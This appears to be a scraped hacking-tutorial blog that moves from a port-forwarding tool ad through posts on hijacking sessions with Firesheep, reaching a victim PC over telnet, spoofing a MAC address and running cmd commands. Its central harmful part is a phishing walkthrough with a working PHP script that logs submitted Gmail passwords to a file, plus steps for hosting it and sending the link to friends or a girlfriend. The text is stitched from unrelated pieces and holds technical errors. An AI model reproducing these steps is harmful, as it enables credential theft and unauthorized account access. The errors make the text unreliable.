Port forwarding with out any router………..

Intro

No hassle PC-only TCP/UDP port forwarding (translation) and reflection is transparent for any application on the OS. Unlike other software, PC-Port-Forwarding performs everything on a Windows® PC without any additional hardware or complicated setups of various components. This application does everything automatically with the high performance and intuitive user interface

.pf1

Port Forwarding Overview

Port forwarding functionality is similar to the network address translation (NAT) except that it performs translation of only the port numbers. To illustrate the concept, two computers on the Internet that communicate with each other using TCP/IP or UDP/IP protocols utilize ports to identify the opposite connection points of each other where the data packets supposed to go to. In order to communicate, each computer knows the port of another computer (in addition to IP address) and sends the data to that port. The PC-Port-Forwarding forwards these ports in such a way that when one computer sends data to the specific port of another computer, the data is actually sent to a different port. This port forwarding is performed transparently for all applications. So, the applications don’t even notice that such forwarding ever occurred.

An example scenario for the incoming port forwarding: When a remote computer sends traffic to the local computer to the specific port (lets say, HTTP port 80), PC-Port-Forwarding can be configured to forward/re-map the destination port 80 to the port the user specifies in PC-Port-Forwarding rules (for example, port 8080). Thus any application on the local computer listening on the port 8080 will be receiving the data from the remote computer which sent the data to the port 80.

Traffic Reflection Overview

In addition to port forwarding, PC-Port-Forwarding can perform traffic reflection, but only for the outgoing traffic. That is when an application on the local computer is sending data to a remote server, PC-Port-Forwarding forwards ports and loops all the data back to the local computer. So, the application that sends the data can be talking to another application on the same local computer while believing it communicates with the remote server.

It is important to note that although the traffic reflection loops traffic back to the local computer, the remote server must have an IP address reachable from the local computer. In other words, the local computer must be able to determine which route to use for sending data to the remote server. Consequently, when the remote server is located on the same subnet as the local computer, that remote server should be up and running in order to indicate to the local computer that its IP address can be reached directly. Remote servers on other subnets reachable via a gateway do not have that requirement for traffic reflection.

An example scenario for the traffic reflection: When an application (for example, a web browser) on the local computer sends a request to the port 80 of a remote server, PC-Port-Forwarding forwards port and loops the data back to, for example, the local port 8111. If the local computer has a web server or some other application listening on the port 8111, then the web browser will be communicating with that local web server instead of the remote server. And once again, the web browser would not know that it communicates with the local web server. For computers with multiple IP addresses (multihomed), reflection will send the traffic back to the IP address the traffic came from.

Working with PC Port Forwarding

The operation of PC-Port-Forwarding is based on rules. Rules can be added and removed from the spreadsheet in the main window. Adding/removing/editing rules can be done via Action menu or with the right mouse click on the spreadsheet.

PC-Port-Forwarding uses destination port as a base for internal port forwarding calculations. The destination port range is displayed in the spreadsheet in the column “Dst Port Range” and tells PC-Port-Forwarding which ports are to be forwarded. For the outgoing traffic, destination port range is a range of ports on the remote server. For the incoming traffic, the destination port range is on the local computer. The resulting after translation port(s) is displayed in the column “Translate to Port(s)”. The port range can be forwarded to a single port (merge operation) or to another port range (shift operation). For translation of port range into a single port, ‘Translate to Port(s)’ would specify the port the all ports from range are forwarded to. While for the forwarding of port range into another port range,‘Translate to First Port’ specifies the lowest port of the range to translate to.

Once all necessary rules are created, they needed to be submitted to the re-mapping engine usingApply button. To stop already applied rules from performing, submit an empty spreadsheet or a spreadsheet with all rules disabled. Whenever new set of rules is applied, the previous one is discarded from the re-mapping engine.

pf2

Adding and editing rules is as simple as 1-2-3. First of all, the dummy rule needed to be added using theAction menu. Then its properties needed to be edited.

  • Every rule has its unique ID which is assigned automatically when the rule is created. It cannot be changed.
  • Each rule can be enabled or disabled. Disabled rules have no effect. All rules are created as disabled.
  • Traffic Direction indicates which traffic direction to analyze when looking for Dst Port Range. When a connection is initiated from the local computer to an external server – it is outgoingdirection. When a remote computer accesses the local computer – it is incoming direction.
  • Dst Port Range specifies the destination port range to analyze. When the traffic is incoming (coming from a remote computer) the destination port range is located on the local computer. For the outgoing traffic, the destination port range is on the remote server.
  • Translate to First Port specifies the first port that the lowest port from the Dst Port Range will become after the port forwarding is performed.
  • Translated Coverage specifies the forwarding of a range of ports to a Single Port (merging) or to a Port Range (shifting).
  • And finally, Traffic Reflection can be either enabled of disabled. For simple port forwarding (when reversal in traffic direction is not needed) it should be disabled. If it is enabled, the outgoing traffic from the local computer will be routed/sent back to the local computer without ever hitting the actual network.   pf3

PC-Port-Forwarding offers notifications for forwarding and reflection actions performed. Notifications are issued only once during connection establishment. After changing notification settings, rules are needed to be re-applied by clicking Apply button.

pf4

The created set of rules can be saved to or loaded from a file.

pf5

Download pc port forwarding here

Video Tutorial:-

How to capture the cookies using firefox??????????

FIRESHEEP TUTORIAL (Http Session Hijacking)

Firesheep a Firefox addon has recently become very popular for easily carrying out a HTTP session hijacking attack. Http session hijacking attack can’t be considered as a very sophisticated attack but needs some technical knowlegde to be performed . But Firesheep makes the attack a child’s play. Firesheep was developed by Eric butler for Firefox, it was released at Toorcon 12 to demonstrate how serious cookie stealing can be.
Now lets understand how Firesheep actually works. When you provide your username and password in login forms of different website and submit it, the browser first encrypts the password and then sends it over the network. The corresponding website compares the information against its internal database and if they match, it sends a cookie(a small text file) to your browser. The browser saves this cookie and uses it to authenticate the user on the website every time the user opens a different page of the website. When the user logs out of his account the browser just deletes the cookie. Now the problem is that this cookies are not encrypted before sending over the network, due to this a hacker can capture this cookies and using them authenticate himself as the user from whom the cookie was stolen.
Now lets see how to use Firesheep.

Step 1)

First download and install WinPcap (WinPcap in Windows is used for capturing network traffic.)
You can use Pcap in libPcap library for unix like systems.
DOWNLOAD WinPcap

Step 2)

Download and open Firesheep in Firefox, it will automatically install it. Or just drag it and place it
over Firefox shortcut (Firesheep at this instant is not supporting Firefox 4 ).
 DOWNLOAD Firesheep. 

Step 3)

After it is installed, in Firefox go to View –>Sidebar –> Firesheep. A side bar will appear in the browser with a button “start capturing”, press it and sit back. In few seconds you will see account details with photos of the target. Click on one of it and you will directly enter in his account. Simple as that.

fox1

(Note:- Using Firesheep to hijack others account is illegal under wiretapping Act.)

 
PERSONAL NOTE:- The addon Firesheep had become very popular recently so software Blacksheep was developed which stops Firesheep

 

Have a lock to use it perfect

 

Remote a PC

  A computer victim IP address:

So if hackers want getting the IP Address of your computer what they do just simply chatting with you on Skype, Hotmail  and Gmail and as well chat room.so they just do follow some step like below

1    .     They just do open the Cmd promt (open from run and then write cmd)

2    .     Now then they type netstat –n (its mean that the recently some IP address                        connected  with your computer )

3    .     After that they can chat with you and now after some chatting.

4    .     Just again type the netstat –n (so there is new IP located )

HOST ALIVE OR NOT:

Like I found the 192.168.0.102 now just after that they can check that the IP address is open or not mean (online it is reply)

Ping 192.168.0.102vm1-2.1

Scan the open ports:

So if the IP is online so now check the ports .so now you download the advance port scanner . if you have nmap, zenmap or backtrack so its better.

 download

Check the Venerable ports and access:

No finally hacker the IP and open ports address so then finally with the telnet command they access in window and Make sure that you have enabled in the computer. If you don’t know just go to control panel > program (add or remove) > add window components > click on the telnet. So now open the command and type like that telnet

telnet (IP Address ) (port number)

telnet 192.168.0.102 23Telnet6

                                             Telnet 7
now they After that you will asked to input the login information like below

telnet 8

Enjoy the services of Telnet

How to START Telnet services in windows????????

Telnet is a common way to remotely control Web servers.Telnet is a user command and an underlyingTCP/IP protocol for accessing remote computers. Through Telnet, an administrator or another user can access someone else’s computer remotely. On the Web, HTTP

The Telnet program runs on your computer and connects your PC to a server on the network. You can then enter commands through the Telnet program and they will be executed as if you were entering them directly on the server console. This enables you to control the server and communicate with other servers on the network. To start a Telnet session, you must log in to a server by entering a valid username and password.
Open control panel.

Then go into programs. Click on  ‘turn windows features on or off ‘ .

telnet5

It will open a dialog box, just check the Telnet Client option and hit the OK button.

telnet4

Now open run Dialog box type services.msc

Locate the “Telnet” service, right-click on it and select Properties

telnet3

In the Startup Type drop down menu, select “Automatic” instead of “Disabled”.Click on Apply button.       telnet2

Right-click on the “Telnet” service again, but this time select Start option on right-click context menu. Telnet Server service should be running after this.

telnet1

Click ok

How to create Fack page:-

 

Phishing Attack:-

Hai Babies, If you do not know what exactly Phishing means, Just read this first.

download (4)

Phishing Page

If you want to hack your friends gmail acount or you want to know with whom your girl friend is chatting infacebook, then just try this and you can spy them without their knowledge.
I could simply give you the phishing page generators or already made fake web pages but I want you to manually create yourself.

First, I shoud tell you the basic methodology of making phishing page of any website. In a website where the users are supposed to enter/submit any data (data might be email,password or anything), there is a piece of code in html code called as action form. It looks like this
<form method=”POST” action=”something”>.
You can find this out by simply viewing the source of web page. Right click on webpage to do so. “something” here in the action field is name or path of the file where submitted data goes. So the idea offake login page is simple. Just download the webpage on your computer, modify the action field to change the path where data goes according to yourself, upload this modified webpage on any web hosting site and you are done..

Steps to create Phishing page:-

1. Create one account in any of the following sites, its for uploading your php @ phishing page.

(000webhost.com,ripway.com, etc)

2. Copy this code and save it as accverify.php
<?php
header (‘Location:http://www.gmail.com ‘);                                                                                Note:-{Here u can use any address u like to create fack}
$handle = fopen(“hacked.txt”, “a”);
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “\r\n”);
}
fwrite($handle, “\r\n”);
fclose($handle);
exit;
?>
3. Create one blank notepad and save it as hacked.txt.

4. Now open Gmail.com, and right click the page and select view source code.
Copy that in notepad and save it as gmailfake.html ( any name you can give)

raj1

Facebook Phishing Page

5. Open gmailfake.html in notepad and press CTRL + F, type action in that find box and search it.

replace the action field and put your php file name.
action – “http//:gmail.com/accounts/serviceloginauth”

replace this as action=”accverify.php”
6. save this as .html.

7. Now open the 000webhost.com, go to control panel, select file manager and upload the three files on it. (accverify.php, gmailfake.html, hacked.txt)

8. Now open the link “www.username.000webhost.com
/gmailfake.html.

Raj2

Phishing Attack

9. It will show a webpage as like gmail. When someone enter the username and pasword, it will redirect to original website, And the password will save on hacked.txt.
10. You can send this link as mail, or when chatting and now you can hack your friends account.
I hope you understand..! This Stuff..!

Hacking anybody’s account with wrong intentions is a Cyber Crime

See this tutorial to understand clearly:-

How to change the Mac Address??????

Windows-8-logo-300x300I recently ran into the problem in where I need to remotely access a computer to get some work done. Most places that allow remote access to work computers employ numerous safeguards to prevent unauthorized access to sensitive data.  One of the safe guards that many places employ to secure their networks is MAC address filtering. This prevents people without the correct MAC address from being able to successfully login.

The problem today was that the computer network I needed to access only allows us to choose a single device’s MAC address to access the network with. I did not have that computer with me, but needed to access the network. What was I to do? I changed my MAC address and I could access the network without a hitch.

*Please check with the company who’s network you are accessing. Subverting protection schemes could be against their computer usage policy or worse been seen as unauthorized access!

What is a MAC address? 

                                           “A Media Access Control address (MAC address) is a unique identifier assigned to network interfaces for communications on the physical network segment. MAC addresses are used for numerous network technologies and most IEEE 802 network technologies, including Ethernet.” 


Changing your MAC address:-

1) Click the start button and open ‘Control Panel’ (Windows 8 just search for Control Panel)download

2) Click the ‘Network and Internet’ option then ‘Network and Sharing Center’images

3) On the left hand side of the screen click ‘Change adapter settings’.download (1)

download (2)

4) This should bring you to your network devices, right click the device you access the internet with and select ‘Properties’. or me it was ‘Local Area Connection’.download (3)

5.) Click the configure button and then the Advanced tab on the top.

6.) Lastly scroll down and select the ‘LOCAL ADMINISTERED ADDRESS’ or ‘PHYSICAL ADDRESS’.

7.) Now you can see the right two options: “NOT PRESENT” and “VALUE”. Select “VALUE” and enter the new mac address which u would like to give.

8.) Then click on OK button at bottom. Your internet disconnected, then reconnect to use ur new MAC ADDRESS

Conclusion:-

It is not a secured method it may increase more treads to a uniq Mac address………..

How to Hack Remote PC Using Telnet

How to turn ON the telnet

Telnet is a common way to remotely control Web servers.Telnet is a user command and an underlyingTCP/IP protocol for accessing remote computers. Through Telnet, an administrator or another user can access someone else’s computer remotely. On the Web, HTTP

The Telnet program runs on your computer and connects your PC to a server on the network. You can then enter commands through the Telnet program and they will be executed as if you were entering them directly on the server console. This enables you to control the server and communicate with other servers on the network. To start a Telnet session, you must log in to a server by entering a valid username and password.

Open control panel.

Then go into programs. Click on ‘turn windows features on or off ‘ .

1

It will open a dialog box, just check the Telnet Client option and hit the OK button.

2

Now open run Dialog box type services.msc

Locate the “Telnet” service, right-click on it and select Properties

3

 

In the Startup Type drop down menu, select “Automatic” instead of “Disabled”.Click on Apply button.

4

Right-click on the “Telnet” service again, but this time select Start option on right-click context menu.

Telnet Server service should be running after this.

5

Click ok

How to Connect Remote PC

Open Command prompt and type telnet (Victim IP)

6

Type User name and Password of Victim PC

7

8

Now you can get access of remote pc

 

Step by step Basic Command Prompt For Looping to Find Live IP Address:

1. If you already understand about basic FOR looping in programming, I believe this tips and trick should be easy for you

.

Open your command prompt (Windows keyboard + R and type cmd).

2. Firstly, the most important one is reading the manual. We can see the help by typing help for to view the manuals.                                          1

3. My computer was resides on 192.168.8.0/24 network. We will try to scan the live IP address on this network using command prompt FOR looping. Here is my command

for /L %h IN (87,1,99) DO ping 192.168.8.%h -l 1 -n 12

Information:

for /L %h –> perform a command for a range of numbers where %h is the variable

IN (87, 1, 99) –> start looping from 87 with step amount 1 until 99

DO ping 192.168.8.%h -l 1 -n 1 –> do the ping to specified IP address. We only send 1 byte buffer size(-l 1) and 1 times echo request(-n 1).

Here is the result (I snip some information and show some live IP address).

 

Conclusion:

1. This method will work if the target IP not blocking the ICMP request.

2. To save the result to .txt file you can add >> result.txt

3

3. For more advanced data extraction, maybe we will cover it on another tips and trick.

Hope it useful

How to use Command Promt?????

1. ipconfig :
This is the top most command for seeing the ip address,subnet mask and default gateway also includes display and flush DNS cache, re-register the system name in DNS..  This will most useful tool for viewing and troubleshooting TCP/IP problem.

8

  • To view ip ,subnet mask address : ipconfig
  • To view all TCP/IP information, use: ipconfig /all
  • To view the local DNS cache, use: ipconfig /displaydns
  • To delete the contents in the local DNS cache, use: ipconfig /flushdns 

2.systeminfo

Have a need to display operating system configuration information for a local or remote machine, including service pack levels? Then systeminfo is the tool to use. When I need to connect to a system that I am not familiar with, this is the first tool I run. The output of this command gives me all the info I need including: host name, OS type, version, product ID, install date, boot time and hardware info (processor and memory). Also knowing what hot fixes are installed can be a big help when troubleshooting problems. This tool can be used to connect to a machine remotely using the following syntax: SYSTEMINFO /S system /U user

3
3. tasklist and taskkill 

If you work with Task Manager (ctrl+alt+del) ,you can easily understand this.  Task list is list of task which are running on windows currently.  If you open any application,it will be added to task.

To List the Tasks type in cmd as :

tasklist

This will show the list of task which are running as shown in the picture3

To stop the Process or task ,there is two methods :
Using Image Name:
We can kill the task using its Image Name as follows:

tasklist /im notepad.exe

Using Process Id:
we can stop the process using its process id as follows :

tasklist /pid 1852

4. type
type is used to read the text document in command prompt .  You can read multiple text in continuously

type filename.txt

4

5.netstat
Need to know who (or what) is making a connection to your computer? Then netstat is the tool you want to run. The output provides valuable information of all connections and listening ports, including the executable used in the connections. In additon to the above info, you can view Ethernet statistics, and resolve connecting host IP Addresses to a fully qualified domain name. I usually run the netstatcommand using the -a (displays all connection info), -n (sorts in numerical form) and -b (displays executable name) switches.

 5

6.net command
Although this tool is more known as a command, the net command is really like a power drill with different bits and is used to update, fix, or view the network or network settings.
It is mostly used for viewing (only services that are started), stopping and starting services:

    • net stop server
    • net start server
    • net start (display running services)

and for connecting (mapping) and disconnecting with shared network drives:

    • net use m: \\myserver\sharename
    • net use m: \\myserver\sharename /delete

Other commands used with net command are, accounts (manage user accounts), net print (manage print jobs), and net share (manage shares).
Below are all the options that can be used with the net command.

[ ACCOUNTS | COMPUTER | CONFIG | CONTINUE | FILE | GROUP | HELP |HELPMSG | LOCALGROUP | PAUSE | PRINT | SESSION | SHARE | START |STATISTICS | STOP | TIME | USE | USER | VIEW ]                                                                  6
7 – nslookup – With the Internet, DNS (Domain Name Service) is the key for allowing us to use friendly names when surfing the web instead of needing to remember IP Addresses. But when there are problems, nslookup can be a valuable tool for testing and troubleshooting DNS servers.
Nslookup can be run in two modes: interactive and noninteractive. Noninteractive mode is useful when only a single piece of data needs to be returned. For example, to resolve google.com:

7

To use the interactive mode, just type nslookup at the prompt. To see all available options, type helpwhile in interactive mode.

Don’t let the help results intimidate you. Nslookup is easy to use. Some of the options I use when troubleshooting are:
set ds (displays detailed debugging information of behind the scenes communication when resolving an host or IP Address).
set domain (sets the default domain to use when resolving, so you don’t need to type the fully qualified name each time).
set type (sets the query record type that will be returned, such as A, MX, NS)
server NAME (allows you to point nslookup to use other DNS servers than what is configured on your computer)
To exit out of interactive mode, type exit .

8 – ping and tracert – These tools can be helpful with connectivity to other systems. Ping will test whether a particular host is reachable across an IP network, while tracert (traceroute) is used to determine the route taken by packets across an IP network.
To ping a system just type at the prompt: ping www.google.com. By default, ping will send three ICMP request to the host and listen for ICMP “echo response” replies. Ping also includes switches to control the number of echo requests to send (-n ), and to resolve IP addresses to hostname (-a ).
To use tracert, type at the prompt: tracert www.google.comYou can force tracert to not resolve address to hostnames by using the -d switch, or set the desired timeout (milliseconds) for each reply using -w switch.8
9 – gpresult – Used mostly in environments that implement group poicies, gpresults (Group Policy Results) verifies all policy settings in effect for a specific user or computer. The command is simple to use, just enter gpresults at the prompt. It can also be used to connect to computers remotely using the /S and /U switches.
10 – netsh – Without a doubt the most powerful command line tool available in Windows. Netsh is like the swiss army knife for configuring and monitoring Windows computers from the command prompt. It capabilities include:

  • Configure interfaces
  • Configure routing protocols
  • Configure filters
  • Configure routes
  • Configure remote access behavior for Windows-based remote access routers that are running the Routing and Remote Access Server (RRAS) Service
  • Display the configuration of a currently running router on any computer

Hacking and a Hacker

Hacking & a Hacker

Technology[edit source | edit-beta]

Entertainment[edit source | edit-beta]

People[edit source | edit-beta]

Real[edit source | edit-beta]

Fictional[edit source | editbeta]AnonymousRevolutions

Other[edit source | editbeta]

  • Hacker Brewery, and its beer, since 1972 merged into Hacker-Pschorr Brewery
  • Hacker-Craft, boats made by the Hacker Boat Company
  • Hacker Fares™, Kayak.com itineraries that require purchasing two or more one-way tickets on separate airlines
  • Hacker Radio Ltd, a British manufacturer of consumer electronics products